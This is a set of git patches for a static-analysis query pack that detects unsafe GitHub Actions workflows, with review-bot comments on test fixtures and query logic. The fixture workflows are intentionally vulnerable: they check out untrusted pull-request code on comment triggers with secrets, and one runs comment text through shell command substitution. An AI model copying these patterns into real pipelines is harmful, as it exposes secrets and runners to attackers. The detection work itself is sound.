steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml new file mode 100644 index 00000000000..878b8377961 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml 
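Review bot: The new fixtures test11.yml, test12.yml and test13.yml carry no comment saying which query is expected to flag them, so the intent has to be reverse-engineered from the `.expected` files. A short header such as `# UntrustedCheckoutCritical: flagged, date check but no actor/association check` for test11.yml, and the matching "not flagged, association check plus date check" line for test12.yml, would make a later change to the expected output reviewable. test11.yml and test12.yml appear to differ only in the job-level `if:` condition, which is worth stating in the same comment.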
@@ -0,0 +1,96 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: > + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + ( + github.event.issue.author_association == 'OWNER' || + github.event.issue.author_association == 'COLLABORATOR' || + github.event.issue.author_association == 'MEMBER' + ) + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml new file mode 100644 index 00000000000..0a73e86d5fc --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml 
@@ -0,0 +1,31 @@ +on: + issue_comment: + types: + - created +jobs: + danger-for-external: + name: Danger for external - Node.js 16 + if: | + github.event_name == 'issue_comment' && github.event.action == 'created' + && github.event.issue.pull_request != null + && startsWith(github.event.comment.body, '/danger') + runs-on: ubuntu-latest + steps: + - name: Check repository permission for user + uses: sushichop/action-repository-permission@v2 + with: + required-permission: write + reaction-permitted: rocket + comment-not-permitted: Sorry, you don't have enough permission to execute `/danger`... + - name: Clone the PR source + uses: actions/checkout@v3 + with: + ref: refs/pull/${{ github.event.issue.number }}/head + fetch-depth: 0 + - uses: actions/setup-node@v3 + with: + node-version: 16 + - name: Danger JS + run: npx danger ci + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index c91470d5cc8..5d38b397a42 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -27,4 +27,5 @@ | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | +| .github/workflows/test13.yml:14:7:20:4 | Uses Step | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 7313ffd9ae3..8bb9e02559c 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -175,6 +175,15 @@ edges | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | +| .github/workflows/test11.yml:30:7:45:4 | Run Step | .github/workflows/test11.yml:45:7:84:4 | Run Step: environment | +| .github/workflows/test11.yml:45:7:84:4 | Run Step: environment | .github/workflows/test11.yml:84:7:90:4 | Uses Step | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | +| .github/workflows/test12.yml:32:7:47:4 | Run Step | .github/workflows/test12.yml:47:7:86:4 | Run Step: environment | +| .github/workflows/test12.yml:47:7:86:4 | Run Step: environment | .github/workflows/test12.yml:86:7:92:4 | Uses Step | +| .github/workflows/test12.yml:86:7:92:4 | Uses Step | .github/workflows/test12.yml:92:7:95:54 | Uses Step | +| .github/workflows/test13.yml:14:7:20:4 | Uses Step | .github/workflows/test13.yml:20:7:25:4 | Uses Step | +| .github/workflows/test13.yml:20:7:25:4 | Uses Step | .github/workflows/test13.yml:25:7:28:4 | Uses Step | +| .github/workflows/test13.yml:25:7:28:4 | Uses Step | .github/workflows/test13.yml:28:7:31:50 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | 
@@ -223,7 +232,7 @@ edges | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. | 
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index b9cf0e547ca..181bd5673bc 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -18,6 +18,7 @@ | .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/test13.yml:20:7:25:4 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From db328f0b164f91338280a0b485a6ecf8df52a85d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 19 Sep 2024 18:24:08 +0200 Subject: [PATCH 0512/1267] Improve Association check --- .../codeql/actions/security/ControlChecks.qll | 27 ++++++++++--------- 1 file changed, 15 insertions(+), 12 deletions(-) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 650ae8d8105..26bee3ca3a6 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll 
@@ -66,7 +66,7 @@ abstract class ControlCheck extends AstNode { } abstract class AssociationCheck extends ControlCheck { - // Checks if the actor is a COLLABORATOR of the repo + // Checks if the actor is a MEMBER/OWNER the repo // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR override predicate protectsCategoryAndEvent(string category, string event) { @@ -182,23 +182,26 @@ class RepositoryIfCheck extends RepositoryCheck instanceof If { class AssociationIfCheck extends AssociationCheck instanceof If { AssociationIfCheck() { // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.event\\.comment\\.author_association\\b", - "\\bgithub\\.event\\.issue\\.author_association\\b", - "\\bgithub\\.event\\.pull_request\\.author_association\\b", - ], _, _) - ) + normalizeExpr(this.getCondition()) + .splitAt("\n") + .regexpMatch([ + ".*\\bgithub\\.event\\.comment\\.author_association\\b.*", + ".*\\bgithub\\.event\\.issue\\.author_association\\b.*", + ".*\\bgithub\\.event\\.pull_request\\.author_association\\b.*", + ]) and + normalizeExpr(this.getCondition()).splitAt("\n").regexpMatch(".*\\bMEMBER\\b.*") and + normalizeExpr(this.getCondition()).splitAt("\n").regexpMatch(".*\\bOWNER\\b.*") } } class AssociationActionCheck extends AssociationCheck instanceof UsesStep { AssociationActionCheck() { this.getCallee() = "TheModdingInquisition/actions-team-membership" and - not exists(this.getArgument("exit")) - or - this.getArgument("exit") = "true" + ( + not exists(this.getArgument("exit")) + or + this.getArgument("exit") = "true" + ) } } From c3d7af8f59383e55202ce3b7575b05bba2861952 Mon Sep 17 00:00:00 2001 
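Review bot: The new `AssociationIfCheck` characteristic predicate only tests that an `author_association` reference, the word `MEMBER` and the word `OWNER` each occur somewhere in the condition; the three `splitAt("\n")` calls are independent and nothing looks at the comparison operator. A condition written with `!=`, or one that mentions the roles on an unrelated line, would therefore be accepted as a protecting check and suppress results, while a stricter condition that compares against `OWNER` alone is no longer recognised. If tightening the match is out of scope, I would at least record the limit next to the regexes, e.g. `// heuristic: presence of author_association, MEMBER and OWNER only; operator polarity is not checked`, and add a fixture with a negated condition. In the first hunk the new comment reads `MEMBER/OWNER the repo`, which is missing an `of`.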
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 19 Sep 2024 18:44:23 +0200 Subject: [PATCH 0513/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 285f9cfe523..9a798b891ba 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.45 +version: 0.1.46 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 3c02acfff19..01b36fe62cd 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.45 +version: 0.1.46 groups: [actions, queries] suites: codeql-suites extractor: javascript From c20e407c16931300a355790e14d77864cb92d593 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 20 Sep 2024 11:52:44 +0200 Subject: [PATCH 0514/1267] Modify UnpinnedActionsTag report node --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 6 ++ ql/src/Security/CWE-829/UnpinnedActionsTag.ql | 2 +- .../CWE-829/UnpinnedActionsTag.expected | 62 +++++++++---------- 4 files changed, 40 insertions(+), 32 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 23832b35bd5..c83abb1ea1d 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -264,6 +264,8 @@ class Environment extends AstNode instanceof EnvironmentImpl { abstract class Uses extends AstNode instanceof UsesImpl { string getCallee() { result = super.getCallee() } + ScalarValue getCalleeNode() { result = super.getCalleeNode() } + string getVersion() { result = super.getVersion() } int getMajorVersion() { result = super.getMajorVersion() } 
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 23b5ead7f0e..2267c7ff694 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1147,6 +1147,8 @@ class EnvImpl extends AstNodeImpl, TEnvNode { abstract class UsesImpl extends AstNodeImpl { abstract string getCallee(); + abstract ScalarValueImpl getCalleeNode(); + abstract string getVersion(); int getMajorVersion() { @@ -1197,6 +1199,8 @@ class UsesStepImpl extends StepImpl, UsesImpl { else result = u.getValue() } + override ScalarValueImpl getCalleeNode() { result.getNode() = u } + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } @@ -1230,6 +1234,8 @@ class ExternalJobImpl extends JobImpl, UsesImpl { u.getValue().regexpCapture(repoUsesParser(), 3) } + override ScalarValueImpl getCalleeNode() { result.getNode() = u } + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index ecdb1d06526..10c21bc368b 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -33,6 +33,6 @@ where uses.getVersion() = version and not isTrustedOrg(repo) and not isPinnedCommit(version) -select uses, +select uses.getCalleeNode(), "Unpinned 3rd party Action '" + name + "' step $@ uses '" + repo + "' with ref '" + version + "', not a pinned commit hash", uses, uses.toString() diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 5d38b397a42..008c3696789 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
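Review bot: The new `getCalleeNode()` declarations in `UsesImpl`, `UsesStepImpl` and `ExternalJobImpl`, and the public wrapper added to `Uses` in Ast.qll, have no QLDoc, unlike the neighbouring `getVersion()` overrides. I would add `/** Gets the scalar node that holds the value of the uses key. */` on the abstract declaration, assuming `u` is that scalar as `u.getValue()` suggests. UnpinnedActionsTag.ql now reports on this node instead of the whole step, so the comment should also say that it is the alert location.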
+++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -1,31 +1,31 @@ -| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | -| 
.github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | -| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| 
.github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | -| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | -| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | -| .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'actionsdesk/lfs-warning' with ref 'v3.2', not a pinned commit hash | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ 
uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'docker/login-action' with ref 'v2', not a pinned commit hash | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'softprops/action-gh-release' with ref 'v1', not a pinned commit hash | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | -| 
.github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | -| .github/workflows/test13.yml:14:7:20:4 | Uses Step | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | -| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:19:13:19:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:23:13:23:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning21.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning22.yml:13:15:13:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | +| 
.github/workflows/artifactpoisoning71.yml:10:15:10:49 | dawidd6/action-download-artifact@v2 | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:94:15:94:39 | codecov/codecov-action@v3 | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:111:15:111:48 | peter-evans/create-pull-request@v5 | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:127:15:127:56 | thollander/actions-comment-pull-request@v2 | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | 